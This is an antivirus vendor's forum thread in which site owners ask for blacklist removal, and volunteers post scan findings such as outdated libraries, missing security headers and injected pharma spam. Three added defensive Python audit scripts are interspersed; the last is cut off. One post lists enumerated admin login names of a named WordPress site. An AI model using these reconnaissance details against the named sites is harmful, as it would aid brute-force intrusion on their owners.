http://urlquery.net/report.php?id=1480455793043

Advice :
- Step away from shared hosting and get dedicated hosting
- Hire a real admin
Title: Re: How to remove my website from your blacklist?
Post by: polonus on November 29, 2016, 11:27:36 PM
Additionally to what Eddy gives:

It is not only avast that blacklists your website.
Please check this list for unknown links on your website:

-http://www.cnbc.com/2016/02/19/farmlogix-helps-give-local-fa  -->  'watch the video. '
-http://bluesky.chicagotribune.com/originals/chi-innovation-a  -->  'read more.'
-http://www.enable-javascript.com/  -->  ' instructions how to enable j'

Check embedded iFrames: <iframe frameborder="0" height="100" src="htxps://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2963.515400278078!2d-87.68029358459327!3d42.03212717921026!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x880fd040821375a3%3A0x4c378715350a0359!2s530+Kedzie+St%2C+Evanston%2C+IL+60202!5e0!3m2!1sen!2sus!4v1466906669023" style="border:0" width="300"></iframe>
<iframe frameborder="0" height="100" src="htxps://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2972.18447076208!2d-87.67518998459919!3d41.84585607922484!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x880e2dbca7c328cd%3A0xa1c903462714893c!2s2404+S+Wolcott+Ave%2C+Chicago%2C+IL+60608!5e0!3m2!1sen!2sus!4v1466902658045" style="border:0" width="300"></iframe>

And there is more on that same IP: http://urlquery.net/report.php?id=1480458285564

polonus

Title: Re: How to remove my website from your blacklist?
Post by: Kim Trien on November 30, 2016, 03:32:21 AM
Hi,

We need your help, my website https://kimnguyen.info/ is being blocked by Avast.
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on November 30, 2016, 07:59:25 AM
You can report a URL here: https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: polonus on November 30, 2016, 10:43:38 AM
WordPress issues: check your plug-ins for latest versions.
Warning: User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   KjmTrue   nkt
2   Curtisenep   curtisenep
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Two vuln. jQuery libraries: http://retire.insecurity.today/#!/scan/685e34288f59df2a3499a0698aac7e84c9fd8e553c717d7d9dc836d0d2b4622b

F-status: https://observatory.mozilla.org/analyze.html?host=kimnguyen.info

Probably the detection is CloudFlare IP related, but wait for a verdict from an Avast Team Member,
as we here are only volunteers with relevant knowledge and cannot unblock your domain,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on November 30, 2016, 01:38:03 PM
I am unblocking kimnguyen[.]info now ;)
Title: Re: How to remove my website from your blacklist?
Post by: Nazrard on December 12, 2016, 09:09:41 AM
Hello.

Need your help with blocked by avast http://balaklava[.]com[.]ua.

Can you please help me?
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on December 12, 2016, 09:13:25 AM
-> https://sitecheck.sucuri.net/results/balaklava.com.ua
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on December 12, 2016, 09:17:11 AM
Seems like an old detection, I am unblocking balaklava[.]com.ua now...
Do check why McAfee (http://www.siteadvisor.com/sites/balaklava.com.ua) thinks there is trouble though, or it might be blocked automatically again!
Title: Re: How to remove my website from your blacklist?
Post by: Nazrard on December 12, 2016, 09:50:36 AM
Thank you for your help!

Now contacting McAfee.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on December 12, 2016, 12:50:15 PM
Not only McAfee is blacklisting the site.
http://www.urlvoid.com/scan/balaklava.com.ua/

Vulnerable libraries (cause = old software used) :
http://retire.insecurity.today/#!/scan/7f6b3fbecf8e384ebffbe36de0d58298a2fa1fc1a3ffcf180c76429ba1150dde
http://zulu.zscaler.com/submission/show/70d98370cf77f449efaea0c659939c8a-1481542346

Multiple blacklistings on that IP/ASN/Domain :
http://urlquery.net/report.php?id=1481542982863

Advice :
- As it is a commercial website, step away from shared hosting. (use dedicated hosting)
- Fix the vulnerable libraries and keep the site software up-to-date
- As personal data from the customers is required when ordering, use a secured protocol (HTTPS)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on December 12, 2016, 02:03:38 PM
Like Eddy stated, there are security issues with this site, despite the fact that it is not malicious as such.

Website could be somewhat more secure: https://observatory.mozilla.org/analyze.html?host=balaklava.com.ua

This here (same origin protection) seems OK: https://sritest.io/#report/a0093546-2ca1-468e-a17b-d0badd1711b4

Overview
Cookies not flagged as "HttpOnly" may be read by client side script and are at risk of being interpreted by a cross site scripting (XSS) attack. Whilst there are times where a cookie set by the server may be legitimately read by client script, most times the "HttpOnly" flag is missing it is due to oversight rather than by design.

Result
It looks like a cookie is being set without the "HttpOnly" flag being set (name : value):
Quote
ci_session : a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22bd48b1cf1a54d2a09adb201361b29e0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%2254.235.159.203%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A12%3A%22asafaweb.com%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1481547481%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D07552ff8ba2eed3c13236e652141f5d034cb83cb
Unless the cookie legitimately needs to be read by JavaScript on the client, the "HttpOnly" flag should always be set to ensure it cannot be read by the client and used in an XSS attack.

polonus (volunteer website security analyst and website error-hunter)
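The HttpOnly finding quoted in the post above can be checked against a site's own Set-Cookie headers. The following Python code is an added example, not part of the original thread or of the scanner that produced the report; the Secure check and the decoding of the PHP-serialized session value go beyond the quoted report, and the sample headers are constructed.

```python
import re
from urllib.parse import quote, unquote

_STR = re.compile(r's:(\d+):"')   # PHP serialized string header, e.g. s:10:"
_INT = re.compile(r'i:(-?\d+);')  # PHP serialized integer, e.g. i:42;


def parse_set_cookie(header_value):
    """Split one Set-Cookie header value into (name, value, attributes)."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def php_array_keys(serialized):
    """Return the keys of a flat PHP-serialized array (strings and ints only).

    Returns [] when the text is not such an array. Anything after the closing
    brace (for example an appended hash) is ignored. PHP string lengths are
    byte counts; this tokenizer assumes ASCII content.
    """
    start = re.match(r"a:\d+:\{", serialized)
    if not start:
        return []
    pos, items = start.end(), []
    while pos < len(serialized) and serialized[pos] != "}":
        s, i = _STR.match(serialized, pos), _INT.match(serialized, pos)
        if s:
            length = int(s.group(1))
            items.append(serialized[s.end():s.end() + length])
            pos = s.end() + length + 2  # skip the closing quote and semicolon
        elif i:
            items.append(int(i.group(1)))
            pos = i.end()
        else:
            return []
    return [str(k) for k in items[0::2]]  # entries alternate key, value


def audit_set_cookie(header_value):
    """Return (cookie name, list of findings) for one Set-Cookie header."""
    name, value, attrs = parse_set_cookie(header_value)
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly")
    if "secure" not in attrs:
        findings.append("missing Secure")
    keys = php_array_keys(unquote(value))
    if keys:
        findings.append("session fields stored in cookie value: " + ", ".join(keys))
    return name, findings


# Constructed sample data: a session cookie shaped like the one in the report,
# and a cookie that carries both flags.
_SESSION = 'a:2:{s:10:"session_id";s:8:"deadbeef";s:10:"ip_address";s:9:"192.0.2.7";}'
SAMPLE_HEADERS = [
    "ci_session=" + quote(_SESSION + "0123abcd", safe="") + "; path=/",
    "lang=en; Path=/; Secure; HttpOnly",
]

if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        cookie, problems = audit_set_cookie(header)
        print(cookie, "->", problems or "ok")
```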
Title: Re: How to remove my website from your blacklist?
Post by: rz350user on December 22, 2016, 02:29:32 AM
Guys, I need some help. My website is blocked by your antivirus. It pops up a warning "Threat Blocked". My url is http://www.centrixbuilders.com

https://sitecheck.sucuri.net/results/http://www.centrixbuilders.com/
http://www.siteadvisor.com/sites/http%3A//www.centrixbuilders.com/
http://www.urlvoid.com/scan/siteadvisor.com/
https://www.mywot.com/en/scorecard/centrixbuilders.com
https://www.virustotal.com/en/url/4719df026d632fb7bf71d3f3e0c7dfd7c62dcd157d8018d05cc026a5e5c8200e/analysis/
http://urlquery.net/report.php?id=1482370839206
http://zulu.zscaler.com/submission/show/fbd47074a61ea3fc7215a70f0752eb00-1482370844
http://retire.insecurity.today/#!/scan/6aefb0da89d0cadd494fe882871bc2a2606a3b69e61e8624e05a2f9686efec05

I have scanned the URL with all the recommendations that are listed in this thread and it's clean, I have also checked it on blacklists and it's clean.
I have tried 4 other Antivirus and no problems, I have to disable Avast to see my site.
I am getting calls from clients that they cannot view the site and they have Avast installed.

Can you help me with this.

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on December 22, 2016, 06:35:05 AM
You can report a URL here: https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on December 22, 2016, 09:19:51 AM
Here is a major problem :
https://www.virustotal.com/en/ip-address/208.109.47.128/information/

Step away from shared hosting on GoDaddy.

Here are some other problems :
http://dnscheck.pingdom.com/?domain=www.centrixbuilders.com
https://securityheaders.io/?q=www.centrixbuilders.com&followRedirects=on
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on December 22, 2016, 02:18:20 PM
I have unblocked centrixbuilders[.]com now, but please do take others' advice seriously ;)
Title: Re: How to remove my website from your blacklist?
Post by: rz350user on December 22, 2016, 03:33:22 PM
Thanks HonzaZ, I appreciate the help..  :)
Title: Re: How to remove my website from your blacklist?
Post by: T-Fin on December 23, 2016, 10:23:17 AM
Hi, I need professional help, I'm a newbie and can't understand these things. My webshop has been blocked by avast and a warning flag pops up: "HTML: RedirME-inf".

www.elektrosavu.com

I have scanned the URL with the links in this topic, but can't find anything:

http://urlquery.net/report.php?id=1482484350334
http://www.urlvoid.com/scan/elektrosavu.com/
https://www.virustotal.com/fi/url/6ad533dcc054b87965b2c2592ea60c094513369b8431b4f75d825ea8febb786d/analysis/

Can someone say what causes this flag?
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on December 23, 2016, 11:18:11 AM
There is an HTML script that redirects users to a blacklisted URL

https://www.virustotal.com/en/file/4c25924914bb3a332140631f101921054e6d98e4490f77fd8cd419ec21a097ec/analysis/1482488231/

Title: Re: How to remove my website from your blacklist?
Post by: polonus on December 23, 2016, 01:27:26 PM
Not only that but there is more insecurity:

SRI Report a meagre D-Status: https://sritest.io/#report/c5d1c7fa-db3c-49c0-b6f9-00fa54705f45

Same library is vuln.: http://retire.insecurity.today/#!/scan/23204d0728b38a3728cf062d05cea0b4cf7701bf683e572a5c39ec5ba6b7d4f8

F-I-A-C-F-X-Status here: https://observatory.mozilla.org/analyze.html?host=www.elektrosavu.com

Nameserver version exposed: 185.20.137.219: "1.2.8.31" for  wXw.elektrosavu.com
The default server page there has insecure IDs tracking:
 66% of the trackers on this site could be protecting you from NSA snooping. Tell to fix it.
 All trackers
At least 3 third parties know you are on this webpage.

 -shaaaaaaaaaaaaa.com
 -Google
-185.20.137.219  -185.20.137.219

While  -elektrosavu.com is on another IP - 80.69.173.28

See insecurity here: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.elektrosavu.com%2Fsuper_search.php%3Fsearch%3D

hackable especially the older revised version of the script: 'super_search.url' => 'http://url/hacks/directory/favorite_setting.xml',
....starting on line 148 of “widget.super_search.php”:

Hire someone with relevant knowledge to keep your webshop site secure, else you would "be food for the birds" in no-time.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: Heitor Chrisostomo on December 24, 2016, 04:19:30 PM
Hello,

I have a domain (startfinanceiro.com) that is being blocked (URL: Bad). I've checked some security sites, which are usually given as a reference, and they say the site is safe.

Https://www.google.com/transparencyreport/safebrowsing/diagnostic/?hl=en#url=startfinanceiro.com

Https://sitecheck.sucuri.net/results/startfinanceiro.com

Https://quttera.com/detailed_report/www.startfinanceiro.com

In this way, I believe it is a false positive ... I would like to know what I can do to get the site out of this Avast lock, which certainly affects not only me but potential visitors to our domain.

I even sent an email to Hostgator and was informed that everything is normal.

I would like to be able to solve this soon, Avast is a very popular antivirus and surely other people are having the same lock, which directly affects future access.

Kind regards.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on December 24, 2016, 05:17:39 PM
There is no URL:Bad in the avast definitions.

If you mean URL:Mal, the message is correct as the IP is blacklisted.

https://www.virustotal.com/en/ip-address/216.172.172.252/information/

There are also more blacklistings on that ASN :
http://urlquery.net/report.php?id=1482596220888

You also have a link on your site that points to a blacklisted IP :
https://www.virustotal.com/en/ip-address/104.28.6.104/information/
Title: Re: How to remove my website from your blacklist?
Post by: Rodrigo_ on December 24, 2016, 05:46:17 PM
My page is being blocked by avast, but I have already reviewed it by Google webmaster tools and there is no problem, it says it's a safe page

Page link: http://neoplayerpodcast.blogspot.com.br

Title: Re: How to remove my website from your blacklist?
Post by: Heitor Chrisostomo on December 24, 2016, 05:48:10 PM
But the fact that ip is blacklisted does not exactly mean that my site is infected or that it is a risk. Unfortunately not everyone has a dedicated host.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on December 24, 2016, 06:13:01 PM
Rodrigo,

Phishing :
http://zulu.zscaler.com/submission/show/fd95ce331acf08196373f9b208215014-1482587200

Redirection to external server :
https://www.websicherheit.at/website-malware-viren-scanner/?url=neoplayerpodcast.blogspot.com.br

Blacklisted :
http://www.urlvoid.com/scan/neoplayerpodcast.blogspot.com.br/
https://www.virustotal.com/en/url/0a5b82c6a0658fac73ff434c73b10935a38f2d814fdb379a3a6dc23878a3fedc/analysis/1482599360/

Multiple blacklistings :
http://urlquery.net/report.php?id=1482599400330

Blacklistings, multiple malicious files distributed :
https://www.virustotal.com/en/ip-address/173.194.74.132/information/
Title: Re: How to remove my website from your blacklist?
Post by: polonus on December 24, 2016, 06:29:03 PM
Additionally to what Eddy says, there is more insecurity:

F-F-A-A-D-X-status: https://observatory.mozilla.org/analyze.html?host=neoplayerpodcast.blogspot.com.br

Potential problems and code flagged starting at line 742 *: https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fneoplayerpodcast.blogspot.com.br&ref_sel=GSP2&ua_sel=ff&fs=1

F-status with serious "same-origin-rule" issues: https://sritest.io/#report/60cd57c3-1ce2-4e9e-86a0-60df52516462

Vuln. jQuery library: -http://neoplayerpodcast.blogspot.com.br
Detected libraries:
jquery - 1.10.2 : (active1) http://code.jquery.com/jquery-1.10.2.min.js
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
(active) - the library was also found to be active by running code
1 vulnerable library detected

Moreover, the site has probably been flagged as it is a PHISH: http://urlquery.net/report.php?id=1482600039161
PHISHing via so-called Bitsler-script *....

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: Heitor Chrisostomo on December 24, 2016, 07:29:56 PM
Is there any way to remove my website, startfinanceiro.com, from blacklist? Is there anyone inside the AVast forum who can do this? I really just wanted to solve the problem ...
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on December 24, 2016, 07:39:13 PM
contact avast  >  https://support.avast.com/support/tickets/new

Title: Re: How to remove my website from your blacklist?
Post by: Eddy on December 24, 2016, 07:54:01 PM
Wrong link.

https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: Heitor Chrisostomo on December 25, 2016, 12:50:47 AM
I've already contacted three or four times this week. Maybe they're on vacation. Anyway ... I'll wait. Merry Christmas!
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on December 26, 2016, 11:40:07 AM
elektrosavu[.]com was unblocked 23rd December ;)

I can visit startfinanceiro[.]com without any problem, the IP has been unblocked yesterday. Do note that it might be blocked again automatically if new malicious content appears on it.

neoplayerpodcast.blogspot[.]com.br was unblocked 6th December ;)
Title: Re: How to remove my website from your blacklist?
Post by: adrian.gheorghe02 on January 03, 2017, 02:30:40 PM
Hello,

My client's domain atelier13.ro was hacked in December. We have cleaned up the ftp and uploaded a new site which is clean. Can you please remove the domain from your blacklist?

Thank you
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on January 03, 2017, 02:42:19 PM
https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on January 03, 2017, 03:36:25 PM
atelier13[.]ro should be unblocked already ;)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 03, 2017, 05:50:34 PM
 :o

Probably comes unblocked, because website is now offline, but it is on a known Locky Distribution IP: https://ransomwaretracker.abuse.ch/ip/176.223.208.37/host/atelier13.ro/
https://hosts-file.net/default.asp?s=+atelier13.ro  hpHosts and nGran listed website.

polonus

Title: Re: How to remove my website from your blacklist?
Post by: c.camargo on January 10, 2017, 05:47:47 PM
Hi,

Avast has blocked our site http://www.javeriana.edu.co but we are an education institution. We ask for your help to unblock our site and to let us know the exact reason for the block.
Thanks a lot.

Carlos
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on January 10, 2017, 05:58:23 PM
Browser difference + link(s?) to blacklisted site :
https://www.websicherheit.at/website-malware-viren-scanner/?url=www.javeriana.edu.co

Suspicious (listed by Dr Web as adult site):
https://www.virustotal.com/en/url/1ce7893211cfebf3807b09c401a7776c7971ccdf705fbaec08321a2678266444/analysis/1484067035/

Blacklistings on that IP :
https://www.virustotal.com/en/ip-address/200.3.149.136/information/

Blacklistings on that AS :
http://urlquery.net/report.php?id=1484066290397

Vulnerable libraries used :
http://retire.insecurity.today/#!/scan/10e3ef4bda02cdab036990f4cee4d8556803684c9f8f2a80643378942a166ce6
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on January 11, 2017, 09:16:27 AM
It was blocked based on this submission: https://www.phishtank.com/phish_detail.php?phish_id=4612030
I added javeriana[.]edu.co to our cleanset, so it will not happen again ;)
Title: Re: How to remove my website from your blacklist?
Post by: c.camargo on January 11, 2017, 03:11:28 PM
Hi,

Thanks a lot for your help. We are contacting blacklist sites to remove our page from these reports. Some, such as Trustwave, indicate that it is a mistake. We will contact www.phishtank.com and CleanMX.

Best regards,
Carlos Camargo
Title: Re: How to remove my website from your blacklist?
Post by: chris647 on February 17, 2017, 10:13:40 AM
Hi,

We are an Email Service Provider and one of our customers who send B2B mails only get their mail marked as spam.

The hostname is relay20.mysmtp1.com

Could you remove that from your blocklist?

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on February 17, 2017, 10:24:08 AM
The domain is not blocked.
Could you post an example of the message? I will forward it to our antispam team.
Title: Re: How to remove my website from your blacklist?
Post by: chris647 on February 17, 2017, 11:51:34 AM
Hi,

I have sent a private message to you with the email getting marked as spam.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on February 17, 2017, 12:19:03 PM
Can confirm, I will forward it to the antispam guys to see what can be done.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 17, 2017, 01:50:34 PM
Hi chris647,

But there certainly are security issues here that should be mitigated:
Quote
It looks like custom errors are not correctly configured as the requested URL contains the heading "Server Error in".

Custom errors are easy to enable, just configure the web.config to ensure the mode is either "On" or "RemoteOnly" and ensure there is a valid "defaultRedirect" defined for a custom error page as follows:

<customErrors mode="RemoteOnly" defaultRedirect="~/Error" />
Silence your headers
Quote
By default, excessive information about the server and frameworks used by an ASP.NET application are returned in the response headers. These headers can be used to help identify security flaws which may exist as a result of the choice of technology exposed in these headers.

Result
The address you entered is unnecessarily exposing the following response headers which divulge its choice of web platform:

Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Clickjacking warning:
Quote
Overview
Websites are at risk of a clickjacking attack when they allow content to be embedded within a frame. An attacker may use this risk to invisibly load the target website into their own site and trick users into clicking on links which they never intended to. An "X-Frame-Options" header should be sent by the server to either deny framing of content, only allow it from the same origin or allow it from a trusted URIs.

Result
It doesn't look like an X-Frame-Options header was returned from the server which means that this website could be at risk of a clickjacking attack. Add a header to explicitly describe the acceptable framing practices (if any) for this site.
Quotes taken from Asafaweb scan report...

The Go-Daddy service at -ip-50-63-202-32.ip.secureserver.net has a questionable web rep.

And the IP the address you gave is on has been associated with Ransomware (Locky): https://ransomwaretracker.abuse.ch/ip/50.63.202.32/

That may be the cause of some blocking it. You should take these issues up with GoDaddy, but they seem only responsible for transporting services and they are not liable for abuse at their services. This is a pity actually, because if they could be held responsible for what abuse they allow (just like various cloud services), we'd likely have a far more secure infrastructure. Now they service "the good, the bad, and the ugly" and that as long as their bills are met.  8)

polonus (volunteer website security analyst and website error-hunter)
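An added example (not from the thread and not the Asafaweb scanner's code) that checks a raw HTTP response for the three findings quoted in the post above: platform-revealing headers, a missing framing policy, and the default ASP.NET error page. The sample responses are constructed, and accepting a CSP frame-ancestors directive as a framing policy is an addition made here.

```python
# Header names taken from the quoted scan result.
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version")


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status line, headers, body).

    Header names are lower-cased; repeated headers are kept as a list.
    """
    head, _, body = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body


def framing_policy(headers):
    """Return a description of the framing policy in force, or None."""
    for value in headers.get("x-frame-options", []):
        if value.upper() in ("DENY", "SAMEORIGIN"):
            return "X-Frame-Options: " + value.upper()
    for policy in headers.get("content-security-policy", []):
        for directive in policy.split(";"):
            if directive.strip().lower().startswith("frame-ancestors "):
                return "CSP " + directive.strip()
    return None


def audit_response(raw):
    """Return a list of findings for one raw HTTP response."""
    _status, headers, body = parse_response(raw)
    findings = []
    for name in DISCLOSURE_HEADERS:
        for value in headers.get(name, []):
            findings.append(f"platform disclosed by {name}: {value}")
    if framing_policy(headers) is None:
        findings.append("no framing policy (X-Frame-Options or CSP frame-ancestors)")
    # The default ASP.NET error page carries this heading; a custom error
    # page configured through customErrors does not.
    if "Server Error in" in body:
        findings.append("default ASP.NET error page served")
    return findings


# Constructed responses: one with the headers listed in the scan result,
# two hardened variants.
WEAK = "\r\n".join([
    "HTTP/1.1 500 Internal Server Error",
    "Content-Type: text/html; charset=utf-8",
    "Server: Microsoft-IIS/7.5",
    "X-AspNet-Version: 4.0.30319",
    "X-Powered-By: ASP.NET",
    "",
    "<html><body><h1>Server Error in '/' Application.</h1></body></html>",
])
HARDENED_XFO = "\r\n".join([
    "HTTP/1.1 404 Not Found",
    "Content-Type: text/html; charset=utf-8",
    "X-Frame-Options: sameorigin",
    "",
    "<html><body><h1>Page not found</h1></body></html>",
])
HARDENED_CSP = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'",
    "",
    "<html><body>ok</body></html>",
])

if __name__ == "__main__":
    for label, raw in (("weak", WEAK), ("xfo", HARDENED_XFO), ("csp", HARDENED_CSP)):
        print(label, "->", audit_response(raw) or "ok")
```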
Title: Re: How to remove my website from your blacklist?
Post by: chris647 on February 17, 2017, 02:27:21 PM
Hi,

Where are you getting those errors from?

There isn't any ASP.NET running on that server (relay20.mysmtp1.com). It is a postfix server on Linux.

Is it coming from one of the domains listed in the email?

Which IP do you mean? I don't see references to any GoDaddy IPs in the email?

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 17, 2017, 03:18:30 PM
Could well be, as what I report is for the main domain and that sub-domain of yours isn't public:
Your server has refused the connection from the File Viewer Tool! (Note: As a part of their security measures some shared hosting services will block this type of tool from scanning the sites they host.) -- so
I cannot even build a DNS report for -mysmtp1.com, still hosted by GoDaddy anyways,

Why I see three locations for your server here : http://www.rexswain.com/cgi-bin/httpview.cgi
and why it has been parked: <!DOCTYPE·html><body·style="padding:0;·margin:0;"><html><body><iframe·src="-http://mcc.godaddy.com/park/rzkzrzqwZF5jLab=/fe/nzcdYzIln2MdoaMuYaOvrt=="·style="visibility:·visible;height:·100%;·position:absolute"·allowtransparency="true"·marginheight="0"·marginwidth="0"·frameborder="0"·width="100%"></iframe></body></html>

uMatrix has prevented the following page from loading
htxp://mcc.godaddy.com/park/rzkzrzqwZF5jLab=/fe/nzcdYzIln2MdoaMuYaOvrt

Do not see any of this on the original registrar's smptp.dk site in Denmark?

polonus
Title: Re: How to remove my website from your blacklist?
Post by: udog on February 22, 2017, 12:15:06 AM
Our Temple website BreadAndTorah.org is blacklisted, however, BitDefender shows nothing bad I think: http://trafficlight.bitdefender.com/info?url=http://breadandtorah.org
Could you please remove it?
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on February 22, 2017, 12:19:30 AM
What is telling you that avast has blacklisted it ?
What other scans/checks did you perform to check for (possible) issues ?
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on February 22, 2017, 12:34:04 AM
Seems like it is time to have a real good talk with your admin or perhaps even better... fire him and hire one that does know how to run a website.

Infected with SEO spam :
https://sitecheck.sucuri.net/results/breadandtorah.org

Links to (possibly) blacklisted sites :
https://www.websicherheit.at/website-malware-viren-scanner/?url=breadandtorah.org

Blacklisted :
https://www.virustotal.com/en/ip-address/96.126.109.103/information/

Vulnerable libraries used :
http://retire.insecurity.today/#!/scan/ea05da86571f18c2514131639e0660255409bd53e9e7421961a8cf9de9f1f59a

Using a 4(!) year old Wordpress version.... >:(
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 22, 2017, 01:17:55 AM
Eddy is right here. The site has been injected with pharma spam due to  security issues.

Please check this list for unknown links on your website:
The scan found some terms that are commonly used in spam hacks.
Hidden overflow from line 165- 170 in the source code.
Quote
imandare l’orgasmo quando si sente parlare di sesso tantrico si pensa subito alla durata
Pharma-spam!

-http://www.saratogasinai.org  -->  'temple sinai,' outside spam...
-http://www.mensa-france.org/files/mensans/cache/comprar-prop  -->  'comprar propecia en farmacia'
-http://www.mensa-france.org/files/mensans/cache/comprar-prop  -->  'comprar propecia en farmacia'
-http://www.institutpourlajustice.org/lp/presentation_ipj/cac  -->  'dove acquistare propecia'
-http://www.institutpourlajustice.org/lp/presentation_ipj/cac  -->  'dove acquistare propecia'
-http://e4n.fr/license.php?page=costo-propecia-in-farmacia-it  -->  'costo propecia in farmacia'
-http://e4n.fr/license.php?page=costo-propecia-in-farmacia-it  -->  'costo propecia in farmacia'
-http://aipcnet.it/meeting_2007/lib/costo-propecia-in-farmaci  -->  'costo propecia in farmacia'
-http://aipcnet.it/meeting_2007/lib/costo-propecia-in-farmaci  -->  'costo propecia in farmacia'
-http://usplucca.it/risorse/2009/fopags/lib/propecia-farmacia  -->  'propecia farmacia online'
-http://usplucca.it/risorse/2009/fopags/lib/propecia-farmacia  -->  'propecia farmacia online'
-http://www.saratogaarms.com  -->  'saratoga arms'
-http://www.theinnatsaratoga.com/  -->  ' the inn at saratoga'
-http://www.fiftysouth.com/  -->  '50 south'

Also consider the F-F-X-status here: https://observatory.mozilla.org/analyze.html?host=breadandtorah.org

Go here to cleanse the website of that filth found: https://aw-snap.info/articles/spam-hack-wordpress.php

polonus (volunteer website security analysis and website error-hunter)
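A site owner can look for this kind of injected block in their own page source. The following added Python example (not the tool used in the post above) lists off-site links that sit inside visually hidden containers or carry pharma-spam terms, together with their source line numbers; the hiding heuristics, the term list and the sample page are assumptions made for the illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed term list, taken from the anchor texts quoted in the post.
SPAM_TERMS = ("propecia", "farmacia")
# Elements that never have an end tag, so they must not go on the open stack.
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
        "link", "meta", "source", "track", "wbr"}


def style_hides(style):
    """Heuristic: does this inline style keep its content out of sight?"""
    s = re.sub(r"\s+", "", style.lower())
    if "display:none" in s or "visibility:hidden" in s:
        return True
    if "overflow:hidden" in s:
        height = re.search(r"(?:^|;)(?:max-)?height:(\d+)", s)
        if height and int(height.group(1)) <= 1:
            return True
    # Content pushed far off-screen, e.g. left:-9999px
    return bool(re.search(r"(?:left|top|text-indent):-\d{3,}", s))


class LinkCollector(HTMLParser):
    """Collect every <a href> with its text, line and hidden-ancestor state."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.stack = []      # (tag, hides_content) for each open element
        self.current = None  # link whose text is being collected
        self.links = []

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        hides = style_hides(attr.get("style") or "") or "hidden" in attr
        if tag not in VOID:
            self.stack.append((tag, hides))
        if tag == "a" and attr.get("href"):
            self.current = {"href": attr["href"], "text": "",
                            "line": self.getpos()[0],
                            "hidden": hides or any(h for _, h in self.stack)}

    def handle_data(self, data):
        if self.current is not None:
            self.current["text"] += data

    def handle_endtag(self, tag):
        if tag == "a" and self.current is not None:
            self.links.append(self.current)
            self.current = None
        # Pop back to the matching open tag, tolerating unclosed children.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break


def suspicious_links(html, site_host):
    """Return (line, href, anchor text, reasons) for flagged off-site links."""
    collector = LinkCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for link in collector.links:
        host = urlparse(link["href"]).hostname or site_host
        offsite = host != site_host and not host.endswith("." + site_host)
        text = " ".join(link["text"].split()).lower()
        reasons = []
        if link["hidden"]:
            reasons.append("hidden")
        if any(t in text or t in link["href"].lower() for t in SPAM_TERMS):
            reasons.append("spam-term")
        if offsite and reasons:
            findings.append((link["line"], link["href"], text, reasons))
    return findings


# Constructed sample page: one legitimate partner link, one injected block.
SAMPLE_HTML = """<html><body>
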